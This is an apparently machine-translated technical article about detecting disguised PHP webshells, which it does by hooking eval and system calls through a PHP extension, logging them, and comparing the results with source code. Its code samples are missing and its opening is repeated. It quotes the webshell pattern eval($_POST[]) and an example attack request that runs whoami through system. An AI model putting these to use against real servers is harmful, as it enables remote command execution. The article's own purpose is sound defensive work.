PHPwebshell deformation detection

Webshell, such as eval ($ _ POST []), is familiar to everyone. in recent years, many variants have been derived based on common webshells, increasing the difficulty of detection. let's take a look at several samples extracted from the internet first ......

1. modify webshell

Webshell, such as eval ($ _ POST []), is familiar to everyone. in recent years, many variants have been derived based on common webshells, increasing the difficulty of detection. let's take a look at several samples taken from the Internet:

1. webshell without ascii code and numbers

2. hide keywords

3. encoding + hidden keywords

According to the publicly available samples, the transformed php
Webshell adopts the hidden keywords (eval, system, etc.) to avoid scanning and killing. A monyer wrote a webshell detection article. he split the webshell into the following structure and executed data and data transmission. the detection idea was to use parentheses as the boundary, match the keyword of the sample that matches the executed data. This is a good idea. I personally think there are two shortcomings:

1. manual maintenance is required to collect new samples.

2. the amount of false positives cannot be estimated.

Looking at this structure, the transformed webshell is nothing more than hiding the execution data or data transmission part. However, no matter how the deformation is, it basically calls the eval, call the system, exec, and other commands to execute the function, anti-virus software detects Trojan viruses by abnormal behaviors. for example, the idea of self-starting the system can also be used in webshell detection. Getting behavior data is the first step.

II. PHP HOOK

Here we only need some sensitive behavior data, such as eval and system calls. The implementation method is very simple. hook these php functions or syntax structures. here we use php extension to implement hook. The following describes the hook method using eval and system.

Eval is a syntax structure. calling eval will eventually call the zend_compile_string function of the php kernel, hook
Eval only needs to rewrite the zend_complie_string function. The process is as follows:

System is an internal function of php. The php code is converted to opcode (command) for execution, and the function call command is ZEND_DO_FCALL. for details, see section 2) it is implemented by reloading ZEND_DO_FCALL. Because we do not need to hook every internal function, we will introduce another method as follows:

The reported data is written in a log file, including the file name, the name of the called function, and the number of lines of code in the file. The log structure and content are as follows:

The attachment contains demo implemented by eval and system function hook. for details, refer to the code. Demo only tested on the php-5.3.6, not compatible with Forget to forgive me.

III. detection

The deformed webshell is divided into two categories. The following describes the detection logic in sequence.

1. hide execution data

If a normal programmer uses eval and system, it will not deliberately convert and hide the function. if a function is executed, but the function name cannot be found in the code, we think this is an abnormal behavior. The following deformation is used as an example.

For example, if a hacker passes in nonalpha. php? _ = System & __= whoami executes a command and the log records

We take the nonalpha. php file's 7th lines at the backend to match the system (string. if it is not found, it is considered to be a deformed webshell.

2. data transfer hiding

Let's take a look at the following example.

This webshell transmits attack loads through the encoded referer, reports the code to the backend using the file name and number of lines recorded in the log file, and compares the code with the code in the backend svn. if they are inconsistent, it is considered as a webshell.

IV. deficiency

The web is subject to a large number of access requests, and the performance and stability of the added php extensions are a severe test. In addition, there is still a promotion and deployment cost for companies with a large number of servers.